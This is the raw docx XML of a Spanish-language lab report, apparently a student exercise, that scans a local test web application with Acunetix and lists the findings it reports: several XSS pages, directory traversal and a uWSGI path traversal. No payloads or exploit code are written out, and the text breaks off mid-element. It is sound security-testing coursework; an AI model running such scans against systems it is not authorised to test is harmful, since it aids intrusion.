    <w:p w14:paraId="6A7D735A" w14:textId="608612BD" w:rsidR="00F21B6A" w:rsidRDefault="005342D0" w:rsidP="00F21B6A">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="005342D0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7942683C" wp14:editId="61504C25">
            <wp:extent cx="5400040" cy="4079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4079875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1289BAB3" w14:textId="48CC16EE" w:rsidR="005342D0" w:rsidRDefault="005342D0" w:rsidP="00F21B6A">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58988140" w14:textId="6DA35774" w:rsidR="005342D0" w:rsidRDefault="005342D0" w:rsidP="00F21B6A">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E5EE9DD" w14:textId="3117F991" w:rsidR="005342D0" w:rsidRDefault="005342D0" w:rsidP="00F21B6A">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="005342D0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74BFC1E8" wp14:editId="15F347D8">
            <wp:extent cx="5400040" cy="2869565"/>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869565"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCE102E" w14:textId="6C0F7931" w:rsidR="005342D0" w:rsidRDefault="005342D0" w:rsidP="00F21B6A">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28A94729" w14:textId="0BDA2F74" w:rsidR="005342D0" w:rsidRDefault="0039449A" w:rsidP="00F21B6A">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">En este caso este comando no encuentra nada, ya que es demasiado intrusivo y a la primera petición el servidor se cae, por lo </w:t>
      </w:r>
      <w:r w:rsidR="000472A2">
        <w:t>tanto,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> no puede escanear </w:t>
      </w:r>
      <w:r w:rsidR="0024647D">
        <w:t>bien esa IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9AC345" w14:textId="77777777" w:rsidR="005342D0" w:rsidRPr="00F21B6A" w:rsidRDefault="005342D0" w:rsidP="00F21B6A">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54970F0B" w14:textId="42290305" w:rsidR="002829E8" w:rsidRPr="00F21B6A" w:rsidRDefault="002829E8" w:rsidP="002829E8">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A65B17B" w14:textId="0685BBDE" w:rsidR="002829E8" w:rsidRPr="00F21B6A" w:rsidRDefault="00E47C24">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc128034154"/>
      <w:r>
        <w:t>Acunetix</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="234881C6" w14:textId="77777777" w:rsidR="00CF28B7" w:rsidRPr="00F21B6A" w:rsidRDefault="00CF28B7" w:rsidP="00CF28B7"/>
    <w:p w14:paraId="4742BBD1" w14:textId="5D6598F0" w:rsidR="00CF28B7" w:rsidRDefault="00E47C24" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Primero tendré que registrarme e</w:t>
      </w:r>
      <w:r w:rsidR="00D353D9">
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> la aplicación web, para sí tener un usuario y una contraseña para poder analizar toda la aplicación:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1169A1" w14:textId="345B2E62" w:rsidR="00E47C24" w:rsidRDefault="00E47C24" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00E47C24">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A4DBA95" wp14:editId="09023295">
            <wp:extent cx="5400040" cy="57937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5793740"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="290F3E8B" w14:textId="0AD52795" w:rsidR="00E47C24" w:rsidRDefault="00E47C24" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00E47C24">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F0B7FBF" wp14:editId="3DC006E4">
            <wp:extent cx="5400040" cy="57937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5793740"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5C2EEF" w14:textId="60E614BD" w:rsidR="00E47C24" w:rsidRDefault="00E47C24" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La contraseña será, </w:t>
      </w:r>
      <w:r w:rsidR="005D2C3E">
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:t>abc123.</w:t>
      </w:r>
      <w:r w:rsidR="005D2C3E">
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B69210" w14:textId="780E763B" w:rsidR="00B172D0" w:rsidRDefault="00B172D0" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DDAB08A" w14:textId="14A80E46" w:rsidR="00B172D0" w:rsidRDefault="00B172D0" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00B172D0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44B52EF3" wp14:editId="39C34E85">
            <wp:extent cx="5400040" cy="57937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5793740"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3851A0" w14:textId="25A5D7DF" w:rsidR="00B172D0" w:rsidRDefault="00B172D0" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66575968" w14:textId="0C3BF583" w:rsidR="00B172D0" w:rsidRDefault="00B172D0" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora se procederá al escaneo con Acunetix:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73465098" w14:textId="05EE4E9E" w:rsidR="00B172D0" w:rsidRDefault="00B172D0" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Lo primero es crear el objetivo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224ABEF8" w14:textId="07B209AC" w:rsidR="00B172D0" w:rsidRDefault="00B172D0" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00B172D0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5429BAC3" wp14:editId="18CF12DF">
            <wp:extent cx="5400040" cy="48082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4808220"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="73875D50" w14:textId="5B13C3FC" w:rsidR="00B172D0" w:rsidRDefault="00B172D0" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2052859F" w14:textId="7E86201D" w:rsidR="00B172D0" w:rsidRDefault="00B172D0" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora gu</w:t>
      </w:r>
      <w:r w:rsidR="000E34DB">
        <w:t>ardaré</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> el login</w:t>
      </w:r>
      <w:r w:rsidR="000E34DB">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8AEF71" w14:textId="3F10CC72" w:rsidR="000E34DB" w:rsidRDefault="000E34DB" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="027FF7C7" w14:textId="7CCAA62F" w:rsidR="000E34DB" w:rsidRDefault="000E34DB" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="000E34DB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AF42A43" wp14:editId="51F345D4">
            <wp:extent cx="5400040" cy="224091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240915"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="055666EB" w14:textId="67C43005" w:rsidR="000E34DB" w:rsidRDefault="000E34DB" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C732813" w14:textId="4D99FD8C" w:rsidR="000E34DB" w:rsidRDefault="000E34DB" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="000E34DB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5ED414B9" wp14:editId="53786A7C">
            <wp:extent cx="5400040" cy="450278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502785"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A0D048" w14:textId="16089399" w:rsidR="000E34DB" w:rsidRDefault="000E34DB" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62130D3A" w14:textId="0FEF5033" w:rsidR="00934B0E" w:rsidRDefault="00934B0E" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AE47E1B" w14:textId="26812D88" w:rsidR="00934B0E" w:rsidRDefault="00934B0E" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00934B0E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44BC93F2" wp14:editId="12CB51A9">
            <wp:extent cx="5400040" cy="478282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782820"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E35D885" w14:textId="13C33022" w:rsidR="000E34DB" w:rsidRDefault="000E34DB" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="000E34DB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="709ECE13" wp14:editId="24A97390">
            <wp:extent cx="5400040" cy="44843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484370"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="421A5381" w14:textId="18DB4B62" w:rsidR="000E34DB" w:rsidRDefault="000E34DB" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FE7AA52" w14:textId="5E3AE475" w:rsidR="000E34DB" w:rsidRDefault="000E34DB" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Y ahora le doy a scan:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145B37C5" w14:textId="0A773D30" w:rsidR="000E34DB" w:rsidRDefault="000E34DB" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B730BE5" w14:textId="27DEC7AB" w:rsidR="000E34DB" w:rsidRDefault="000E34DB" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="000E34DB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41A7BB3F" wp14:editId="5AC738E6">
            <wp:extent cx="4802541" cy="3458973"/>
            <wp:effectExtent l="0" t="0" r="0" b="825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02541" cy="3458973"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="289EA51E" w14:textId="0DC893E5" w:rsidR="000E34DB" w:rsidRDefault="000E34DB" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62DE5FC0" w14:textId="41B25BB3" w:rsidR="00A83B81" w:rsidRDefault="00A83B81" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Resultados del análisis:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9948E5" w14:textId="70D29289" w:rsidR="00A83B81" w:rsidRDefault="00EE798D" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE798D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="473C3986" wp14:editId="72318545">
            <wp:extent cx="5400040" cy="243078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430780"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="594C9651" w14:textId="6A2F87B3" w:rsidR="00EE798D" w:rsidRDefault="00EE798D" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C75DBE8" w14:textId="02248660" w:rsidR="00EE798D" w:rsidRDefault="00EE798D" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE798D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66D26AFF" wp14:editId="33814AEF">
            <wp:extent cx="5400040" cy="2245360"/>
            <wp:effectExtent l="0" t="0" r="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245360"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E43B24B" w14:textId="72EE0EAD" w:rsidR="00EE798D" w:rsidRDefault="00EE798D" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31B60620" w14:textId="71DE319F" w:rsidR="00EE798D" w:rsidRDefault="00EE798D" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Se puede ver que encontró 6 vulnerabilidades que Acunetix consi</w:t>
      </w:r>
      <w:r w:rsidR="00711AF7">
        <w:t>dera de nivel alto y tres de nivel medio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346BE183" w14:textId="0A3B5B58" w:rsidR="000E34DB" w:rsidRDefault="007B04B8" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Vamos a</w:t>
      </w:r>
      <w:r w:rsidR="00711AF7">
        <w:t xml:space="preserve"> analizar las vulnerabilidades:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7BA2E2" w14:textId="0B1E480B" w:rsidR="00711AF7" w:rsidRDefault="00711AF7" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Tenemos XSS en la página: 192.168.1.99:8080 -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BE78C8" w14:textId="1B5DBD9D" w:rsidR="00711AF7" w:rsidRDefault="00711AF7" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00711AF7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A5D8E90" wp14:editId="461128F9">
            <wp:extent cx="5400040" cy="5008245"/>
            <wp:effectExtent l="0" t="0" r="0" b="190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5008245"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA187F6" w14:textId="77777777" w:rsidR="00711AF7" w:rsidRDefault="00711AF7" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Tenemos también XSS en la página:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763FEBC0" w14:textId="71B79379" w:rsidR="00711AF7" w:rsidRDefault="00711AF7" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId122" w:history="1">
        <w:r w:rsidRPr="003267AB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>http://192.168.1.99:8080/508597601879981526966878461485870966098/snippets.gtl</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B74944" w14:textId="1382BF80" w:rsidR="00711AF7" w:rsidRDefault="00711AF7" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19F9467A" w14:textId="11E9BDB7" w:rsidR="00711AF7" w:rsidRDefault="00711AF7" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00711AF7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10EA0F3E" wp14:editId="43B1100C">
            <wp:extent cx="5400040" cy="562737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5627370"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1FC4AF" w14:textId="1F30A119" w:rsidR="00711AF7" w:rsidRDefault="00711AF7" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tenemos XSS en la página: </w:t>
      </w:r>
      <w:hyperlink r:id="rId124" w:history="1">
        <w:r w:rsidRPr="003267AB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>http://192.168.1.99:8080/508597601879981526966878461485870966098/deletesnippet</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">  -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A10F8E" w14:textId="711389F6" w:rsidR="00711AF7" w:rsidRDefault="00711AF7" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00711AF7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DD68F37" wp14:editId="3A307C0B">
            <wp:extent cx="5400040" cy="5599430"/>
            <wp:effectExtent l="0" t="0" r="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5599430"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A085A6" w14:textId="39E959AA" w:rsidR="00711AF7" w:rsidRDefault="00711AF7" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4821A3A7" w14:textId="261EE8FF" w:rsidR="00711AF7" w:rsidRDefault="00711AF7" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">XSS en la página: </w:t>
      </w:r>
      <w:hyperlink r:id="rId126" w:history="1">
        <w:r w:rsidRPr="003267AB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>http://192.168.1.99:8080/508597601879981526966878461485870966098/newsnippet2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADD418D" w14:textId="366C2FD6" w:rsidR="00711AF7" w:rsidRDefault="00711AF7" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00711AF7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EBE8EC5" wp14:editId="661E6095">
            <wp:extent cx="5400040" cy="560578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5605780"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F73FA4F" w14:textId="530B8F33" w:rsidR="00711AF7" w:rsidRDefault="00711AF7" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79E551E0" w14:textId="77777777" w:rsidR="00711AF7" w:rsidRDefault="00711AF7" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Server directory traversal:  </w:t>
      </w:r>
      <w:hyperlink r:id="rId128" w:history="1">
        <w:r w:rsidRPr="003267AB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>http://192.168.1.99:8080/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB0584C" w14:textId="2BC15508" w:rsidR="00711AF7" w:rsidRDefault="00711AF7" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00711AF7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="008B8FE2" wp14:editId="4FD3B2E6">
            <wp:extent cx="5400040" cy="5634355"/>
            <wp:effectExtent l="0" t="0" r="0" b="44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634355"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E7E55B" w14:textId="1957074E" w:rsidR="00711AF7" w:rsidRDefault="00711AF7" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45FD6477" w14:textId="379D8EA9" w:rsidR="00711AF7" w:rsidRDefault="00711AF7" w:rsidP="00711AF7">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00711AF7">
        <w:t>uWSGI Path Traversal vulnerability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> en : </w:t>
      </w:r>
      <w:hyperlink r:id="rId130" w:history="1">
        <w:r w:rsidRPr="003267AB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>http://192.168.1.99:8080/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3276C58F" w14:textId="1185D01A" w:rsidR="00711AF7" w:rsidRDefault="00711AF7" w:rsidP="00711AF7">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="558D1E0E" w14:textId="57C67829" w:rsidR="00711AF7" w:rsidRPr="00711AF7" w:rsidRDefault="00711AF7" w:rsidP="00711AF7">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00711AF7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73FC9EF9" wp14:editId="20CD8CC6">
            <wp:extent cx="5400040" cy="56280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5628005"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC00D62" w14:textId="77777777" w:rsidR="00711AF7" w:rsidRDefault="00711AF7" w:rsidP="00E47C24">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AA66019" w14:textId="77777777" w:rsidR="00711AF7" w:rsidRPr="00711AF7" w:rsidRDefault="00711AF7" w:rsidP="00711AF7"/>
    <w:p w14:paraId="56AD416C" w14:textId="30AE66C2" w:rsidR="00711AF7" w:rsidRDefault="00711AF7" w:rsidP="00711AF7">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711AF7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
